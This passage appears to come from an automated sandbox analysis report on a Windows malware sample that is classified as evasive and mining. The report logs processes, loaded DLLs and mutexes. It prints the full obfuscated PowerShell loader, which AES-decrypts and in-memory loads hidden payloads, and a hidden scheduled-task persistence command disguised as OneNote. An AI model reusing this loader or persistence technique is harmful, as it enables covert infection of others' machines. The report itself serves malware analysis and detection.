    Source: powershell.exe, 00000007.00000002.1745848773.0000021780F42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1977549931.0000021520B53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2154093545.000001DF176D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2316867721.000001EBBB94D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2630221027.0000013D01587000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
    Source: powershell.exe, 00000007.00000002.1760886154.0000021790092000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1745848773.0000021781C1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1745848773.00000217802E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1760886154.00000217901C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1928032545.00000240AA935000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: powershell.exe, 00000007.00000002.1745848773.00000217819D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
    Source: powershell.exe, 00000007.00000002.1745848773.00000217819D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX

    System Summary

    Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 2195
    Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 2215
    Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 2195
    Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 2215
    Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_00007FF65A35C300: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 0_2_00007FF65A35C300
    Source: classification engine Classification label: mal84.evad.mine.winEXE@40/31@1/0
    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF65A35B6E8 GetLastError,FormatMessageW,LocalFree
    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF65A3785A4 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
    Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_6975453
    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6808:120:WilError_03
    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7240:120:WilError_03
    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4076:120:WilError_03
    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5324:120:WilError_03
    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7536:120:WilError_03
    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kr5pungr.4m2.ps1
    Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\win.ini
    Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: file.exe ReversingLabs: Detection: 21%
    Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
    Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
    Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\mhk.cmd" "
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\mhk.cmd"
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\mhk.cmd';$Rtyv='RezYkvadzYkvLizYkvneszYkv'.Replace('zYkv', ''),'ETUMknTUMktrTUMkyPoTUMkiTUMknTUMktTUMk'.Replace('TUMk', ''),'CrigeoeaigeoteigeoDigeoecigeorypigeotoigeorigeo'.Replace('igeo', ''),'TghdlranghdlsghdlfghdloghdlrmghdlFighdlnalghdlBghdlloghdlckghdl'.Replace('ghdl', ''),'GGYNueGYNutGYNuCuGYNurrGYNuenGYNutPGYNurGYNuoceGYNusGYNusGYNu'.Replace('GYNu', ''),'LoalBOkdlBOk'.Replace('lBOk', ''),'ElROFDeROFDmeROFDntAROFDtROFD'.Replace('ROFD', ''),'Shhcaplihhcathhca'.Replace('hhca', ''),'FrolQelmBlQelalQelslQelelQel6lQel4lQelStlQelrinlQelglQel'.Replace('lQel', ''),'MkRoPainkRoPMkRoPodkRoPukRoPlekRoP'.Replace('kRoP', ''),'CoCPyCpyTCPyCoCPyC'.Replace('CPyC', ''),'DecwUeRowUeRmprwUeReswUeRswUeR'.Replace('wUeR', ''),'ChqcmhahqcmnhqcmgeEhqcmxthqcmenshqcmiohqcmnhqcm'.Replace('hqcm', ''),'Inpsjavopsjakpsjaepsja'.Replace('psja', '');powershell -w hidden;function tNioj($ePEhV){$iYroy=[System.Security.Cryptography.Aes]::Create();$iYroy.Mode=[System.Security.Cryptography.CipherMode]::CBC;$iYroy.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$iYroy.Key=[System.Convert]::($Rtyv[8])('SAaw/5aaxUAhEMFj4gdvF4EfnK5mel+MrvInWCktw5A=');$iYroy.IV=[System.Convert]::($Rtyv[8])('5qReXrx1Mz3EZX5V7wyNKQ==');$VcojP=$iYroy.($Rtyv[2])();$VYqzB=$VcojP.($Rtyv[3])($ePEhV,0,$ePEhV.Length);$VcojP.Dispose();$iYroy.Dispose();$VYqzB;}function uMMXI($ePEhV){$vtWcn=New-Object System.IO.MemoryStream(,$ePEhV);$wwnvp=New-Object System.IO.MemoryStream;$Guujf=New-Object System.IO.Compression.GZipStream($vtWcn,[IO.Compression.CompressionMode]::($Rtyv[11]));$Guujf.($Rtyv[10])($wwnvp);$Guujf.Dispose();$vtWcn.Dispose();$wwnvp.Dispose();$wwnvp.ToArray();}$sQMZI=[System.IO.File]::($Rtyv[0])([Console]::Title);$FEXOj=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 5).Substring(2))));$SgTUK=uMMXI 
(tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 6).Substring(2))));[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$SgTUK).($Rtyv[1]).($Rtyv[13])($null,$null);[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$FEXOj).($Rtyv[1]).($Rtyv[13])($null,$null); "
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\Desktop\mhk')
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 64476' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network64476Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\user\AppData\Roaming\Network64476Man.cmd"
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Roaming\Network64476Man.cmd"
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Network64476Man.cmd"
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Network64476Man.cmd';$Rtyv='RezYkvadzYkvLizYkvneszYkv'.Replace('zYkv', ''),'ETUMknTUMktrTUMkyPoTUMkiTUMknTUMktTUMk'.Replace('TUMk', ''),'CrigeoeaigeoteigeoDigeoecigeorypigeotoigeorigeo'.Replace('igeo', ''),'TghdlranghdlsghdlfghdloghdlrmghdlFighdlnalghdlBghdlloghdlckghdl'.Replace('ghdl', ''),'GGYNueGYNutGYNuCuGYNurrGYNuenGYNutPGYNurGYNuoceGYNusGYNusGYNu'.Replace('GYNu', ''),'LoalBOkdlBOk'.Replace('lBOk', ''),'ElROFDeROFDmeROFDntAROFDtROFD'.Replace('ROFD', ''),'Shhcaplihhcathhca'.Replace('hhca', ''),'FrolQelmBlQelalQelslQelelQel6lQel4lQelStlQelrinlQelglQel'.Replace('lQel', ''),'MkRoPainkRoPMkRoPodkRoPukRoPlekRoP'.Replace('kRoP', ''),'CoCPyCpyTCPyCoCPyC'.Replace('CPyC', ''),'DecwUeRowUeRmprwUeReswUeRswUeR'.Replace('wUeR', ''),'ChqcmhahqcmnhqcmgeEhqcmxthqcmenshqcmiohqcmnhqcm'.Replace('hqcm', ''),'Inpsjavopsjakpsjaepsja'.Replace('psja', '');powershell -w hidden;function tNioj($ePEhV){$iYroy=[System.Security.Cryptography.Aes]::Create();$iYroy.Mode=[System.Security.Cryptography.CipherMode]::CBC;$iYroy.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$iYroy.Key=[System.Convert]::($Rtyv[8])('SAaw/5aaxUAhEMFj4gdvF4EfnK5mel+MrvInWCktw5A=');$iYroy.IV=[System.Convert]::($Rtyv[8])('5qReXrx1Mz3EZX5V7wyNKQ==');$VcojP=$iYroy.($Rtyv[2])();$VYqzB=$VcojP.($Rtyv[3])($ePEhV,0,$ePEhV.Length);$VcojP.Dispose();$iYroy.Dispose();$VYqzB;}function uMMXI($ePEhV){$vtWcn=New-Object System.IO.MemoryStream(,$ePEhV);$wwnvp=New-Object System.IO.MemoryStream;$Guujf=New-Object System.IO.Compression.GZipStream($vtWcn,[IO.Compression.CompressionMode]::($Rtyv[11]));$Guujf.($Rtyv[10])($wwnvp);$Guujf.Dispose();$vtWcn.Dispose();$wwnvp.Dispose();$wwnvp.ToArray();}$sQMZI=[System.IO.File]::($Rtyv[0])([Console]::Title);$FEXOj=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 
5).Substring(2))));$SgTUK=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 6).Substring(2))));[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$SgTUK).($Rtyv[1]).($Rtyv[13])($null,$null);[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$FEXOj).($Rtyv[1]).($Rtyv[13])($null,$null); "
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\AppData\Roaming\Network64476Man')
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 64476' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network64476Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: dxgidebug.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: sfc_os.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: dwmapi.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: riched20.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: usp10.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: msls31.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: windowscodecs.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: pcacli.dll
    Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll
    Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
    Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
